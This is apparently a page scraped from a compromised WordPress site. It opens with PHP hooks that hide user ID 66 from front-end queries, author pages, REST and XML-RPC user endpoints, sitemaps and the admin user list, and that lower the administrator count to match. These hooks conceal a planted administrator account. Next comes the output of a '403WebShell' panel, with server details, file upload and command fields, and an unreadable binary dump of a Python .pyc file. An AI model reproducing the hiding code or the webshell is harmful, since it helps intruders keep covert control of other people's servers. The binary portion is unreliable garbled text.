add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/self/root/lib/python3.12/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/lib/python3.12/__pycache__/copyreg.cpython-312.pyc
�

:5j�����dZgd�ZiZdd�Zd�Zd�Zeeee�d�Zeee	e
z�e�d�ZdZee	j�Zd	�Zd
�Zd�Zd�ZiZiZiZd
�Zd�Zd�Zy)z�Helper to provide extensibility for pickle.

This is only useful to add pickle support for extension types defined in
C, not for instances of user-defined classes.
)�pickle�constructor�
add_extension�remove_extension�clear_extension_cacheNc�^�t|�std��|t|<|�t|�yy)Nz$reduction functions must be callable)�callable�	TypeError�dispatch_tabler)�ob_type�pickle_function�constructor_obs   �/usr/lib/python3.12/copyreg.pyrrs5���O�$��>�?�?�-�N�7���!��N�#�"�c�0�t|�std��y)Nzconstructors must be callable)rr	)�objects rrrs���F���7�8�8�rc�>�t|j|jffS�N)�complex�real�imag)�cs r�pickle_complexrs���Q�V�V�Q�V�V�$�$�$rc�Z�ddl}ddl}|j|j|jffS)N�)�	functools�operator�reduce�or_�__args__)�objrrs   r�pickle_unionr!!s#������h�l�l�C�L�L�9�9�9rc���|turtj|�}|S|j||�}|jtjk7r|j||�|Sr)r�__new__�__init__)�cls�base�stater s    r�_reconstructorr()sS���v�~��n�n�S�!��
�J��l�l�3��&���=�=�F�O�O�+��M�M�#�u�%��Jric���|dksJ�|j}|jD]P}t|d�r|jtzsn5|j
}t
|t�s�A|j|us�Pnt}|turd}n%||urtd|j�d���||�}|||f}	|j}t|�jtjurt|dd�rtd��|�}|r	t"||fSt"|fS#t$rKt|dd�rtd|j�d|���d�	|j }n#t$rd}YnwxYwY�fwxYw)N��	__flags__zcannot pickle z object�	__slots__zNa class that defines __slots__ without defining __getstate__ cannot be pickledzf object: a class that defines __slots__ without defining __getstate__ cannot be pickled with protocol )�	__class__�__mro__�hasattrr+�	_HEAPTYPEr#�
isinstance�	_new_type�__self__rr	�__name__�__getstate__�type�getattr�AttributeError�__dict__r()	�self�protor%r&�newr'�args�getstate�dicts	         r�
_reduce_exr@7s����1�9��9�
�.�.�C�������4��%�d�n�n�y�.H���l�l���c�9�%�#�,�,�$�*>������v�~����3�;��n�S�\�\�,<�G�D�E�E��T�
����u��D���$�$��
��J�#�#�v�':�':�:��D�+�t�,��F�G�
G��z����t�T�)�)��t�#�#��'�	��4��d�+��n�S�\�\�,<�=-�.3�G�5�6�<@�
@�	��=�=�D���	��D�	��	�s6�/D�2E&�E�E&�E �E&�E � E&�%E&c�(�|j|g|���Sr�r#)r%r=s  r�
__newobj__rCbs���3�;�;�s�"�T�"�"rc�.�|j|g|��i|��S)zUsed by pickle protocol 4, instead of __newobj__ to allow classes with
    keyword-only arguments to be pickled correctly.
    rB)r%r=�kwargss   r�
__newobj_ex__rFes���3�;�;�s�,�T�,�V�,�,rc��|jjd�}|�|Sg}t|d�sn�|jD]�}d|jvs�|jd}t	|t
�r|f}|D]�}|dvr�|j
d�rW|jd�sF|jjd�}|r|jd|�|����^|j|��p|j|�����	||_|S#Y|SxYw)a�Return a list of slot names for a given class.

    This needs to find slots defined by the class and its bases, so we
    can't simply return the __slots__ attribute.  We must walk down
    the Method Resolution Order and concatenate the __slots__ of each
    class found there.  (This assumes classes don't modify their
    __slots__ attribute to misrepresent their slots after the class is
    defined.)
    �
__slotnames__r,)r9�__weakref__�__�_)r9�getr/r.r1�str�
startswith�endswithr4�lstrip�appendrH)r%�namesr�slots�name�strippeds      r�
_slotnamesrVks��
�L�L���_�-�E�����
�E��3��$�����	+�A��a�j�j�(��
�
�;�/���e�S�)�"�H�E�!�+�D��:�:� �����.�t�}�}�T�7J�#$�:�:�#4�#4�S�#9��#�!�L�L�H�d�)C�D�!�L�L��.����T�*�+�
	+�*
�!����L��
���L�s�7D�Dc�l�t|�}d|cxkrdkstd��td��||f}tj|�|k(rtj|�|k(ry|tvrtd|�dt|����|tvrtd|�dt|����|t|<|t|<y)	zRegister an extension code.�i���zcode out of rangeN�key z! is already registered with code zcode z is already in use for key )�int�
ValueError�_extension_registryrL�_inverted_registry��modulerT�code�keys    rrr�s����t�9�D���"�
�"��,�-�-�#��,�-�-��4�.�C�����$��,����t�$��+��
�!�!���2�3�7�9�:�	:��!�!��� 2�4� 8�:�;�	;�#����"��t�rc���||f}tj|�|k7stj|�|k7rtd|�d|����t|=t|=|tvrt|=yy)z0Unregister an extension code.  For testing only.rYz is not registered with code N)r\rLr]r[�_extension_cacher^s    rrr�sn���4�.�C�����$��,����t�$��+���t�%�&�	&��C� ��4� �����T�"� rc�,�tj�yr)rc�clear�rrrr�s�����rr)�__doc__�__all__r
rrrrr!r6rZrMr(r0r#r2r@rCrFrVr\r]rcrrrrfrr�<module>ris����I����$�9�%��w���(�:��t�C�#�I���%��
�	������	�'$�V#�-�1�x������#�$
#�r

Youez - 2016 - github.com/yon3zu
LinuXploit